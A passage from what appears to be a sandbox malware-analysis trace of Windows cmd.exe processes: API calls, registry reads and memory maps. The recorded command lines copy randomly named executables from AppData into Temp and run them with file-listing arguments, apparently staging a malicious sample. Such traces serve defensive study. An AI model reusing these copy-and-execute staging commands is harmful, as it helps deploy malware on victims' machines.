returned -66 [0111.495] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0111.495] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0111.495] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0111.495] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0111.495] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0111.495] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0111.495] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0111.495] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0111.495] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0111.495] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0111.495] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0111.495] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0111.495] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0111.495] SetErrorMode (uMode=0x0) returned 0x0 [0111.495] SetErrorMode (uMode=0x1) returned 0x0 [0111.495] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3e04c0, lpFilePart=0x26ee64 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x26ee64*="Temp") returned 0x23 [0111.496] SetErrorMode (uMode=0x0) returned 0x1 [0111.496] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0111.496] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.499] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.499] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", fInfoLevelId=0x1, lpFindFileData=0x26ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec00) returned 0x3d0f68 [0111.499] FindClose (in: hFindFile=0x3d0f68 | out: hFindFile=0x3d0f68) returned 1 
[0111.499] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0111.499] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0111.499] GetConsoleTitleW (in: lpConsoleTitle=0x26f0d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.499] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef60, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f028 | out: lpAttributeList=0x26ef60, lpSize=0x26f028) returned 1 [0111.499] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef60, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f020, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef60, lpPreviousValue=0x0) returned 1 [0111.499] GetStartupInfoW (in: lpStartupInfo=0x26ef1c | out: lpStartupInfo=0x26ef1c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0111.500] 
_wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0111.500] lstrcmpW 
(lpString1="\\bkM66bYk.exe", lpString2="\\XCOPY.EXE") returned -1 [0111.502] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26efbc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f008 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessInformation=0x26f008*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd5c, dwThreadId=0xd60)) returned 1 [0111.807] CloseHandle (hObject=0x4c) returned 1 [0111.807] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0111.807] GetEnvironmentStringsW () returned 0x3e2cf8* [0111.807] FreeEnvironmentStringsW (penv=0x3e2cf8) returned 1 [0111.807] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0112.670] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26eefc | out: lpExitCode=0x26eefc*=0x0) returned 1 [0112.670] CloseHandle (hObject=0x50) returned 1 [0112.670] _vsnwprintf (in: _Buffer=0x26f044, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ef08 | out: _Buffer="00000000") returned 8 [0112.670] SetEnvironmentVariableW (lpName="=ExitCode", 
lpValue="00000000") returned 1 [0112.670] GetEnvironmentStringsW () returned 0x3e2480* [0112.670] FreeEnvironmentStringsW (penv=0x3e2480) returned 1 [0112.670] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0112.670] GetEnvironmentStringsW () returned 0x3e2480* [0112.670] FreeEnvironmentStringsW (penv=0x3e2480) returned 1 [0112.670] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef60 | out: lpAttributeList=0x26ef60) [0112.670] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.670] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.670] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.670] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.671] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.671] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.671] SetConsoleInputExeNameW () returned 0x1 [0112.671] GetConsoleOutputCP () returned 0x1b5 [0112.671] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.671] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.671] exit (_Code=0) Process: id = "40" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16820" os_pid = "0xd44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" 
[0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6877 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6878 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6879 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6880 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 6881 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 6882 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6883 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6884 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6885 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 6886 start_va = 0x7ffdf000 end_va = 0x7ffdffff 
entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 6913 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6914 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6915 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6916 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 6917 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 6918 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 6919 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6920 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 6921 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6922 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" 
(normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6923 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6924 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 6925 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6926 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 6927 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 6928 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6929 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6930 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 6931 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6932 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 6933 start_va = 0x1f0000 end_va = 0x1f0fff 
entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6934 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 6935 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 6936 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 7012 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 68 os_tid = 0xd48 [0111.774] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf7dc | out: lpSystemTimeAsFileTime=0x1cf7dc*(dwLowDateTime=0x80a12c60, dwHighDateTime=0x1d440a9)) [0111.774] GetCurrentProcessId () returned 0xd44 [0111.774] GetCurrentThreadId () returned 0xd48 [0111.774] GetTickCount () returned 0x26c39 [0111.774] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf7d4 | out: lpPerformanceCount=0x1cf7d4*=16856283901) returned 1 [0111.774] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0111.774] __set_app_type (_Type=0x1) [0111.774] __p__fmode () returned 0x76b331f4 [0111.774] __p__commode () returned 0x76b331fc [0111.774] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0111.774] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0111.775] GetCurrentThreadId () returned 0xd48 [0111.775] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd48) returned 0x38 [0111.775] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 
[0111.775] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0111.775] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.775] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.775] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf76c | out: phkResult=0x1cf76c*=0x0) returned 0x2 [0111.775] VirtualQuery (in: lpAddress=0x1cf7a3, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.775] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0111.775] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0111.775] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.775] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0111.775] GetConsoleOutputCP () returned 0x1b5 [0111.775] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.775] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0111.775] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0111.775] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0111.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.776] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.776] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.776] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.776] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.776] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.776] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0111.776] GetEnvironmentStringsW () returned 0x3b0460* [0111.776] FreeEnvironmentStringsW (penv=0x3b0460) returned 1 [0111.776] GetEnvironmentStringsW () returned 0x3b0460* [0111.776] FreeEnvironmentStringsW (penv=0x3b0460) returned 1 [0111.776] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6dc | out: phkResult=0x1ce6dc*=0x40) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x10, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | 
out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x0, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegCloseKey (hKey=0x40) returned 0x0 [0111.777] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6dc | out: phkResult=0x1ce6dc*=0x40) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x0, lpcbData=0x1ce6e0*=0x4) 
returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegCloseKey (hKey=0x40) returned 0x0 [0111.777] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886359 [0111.777] srand (_Seed=0x5b886359) [0111.777] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0111.777] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && 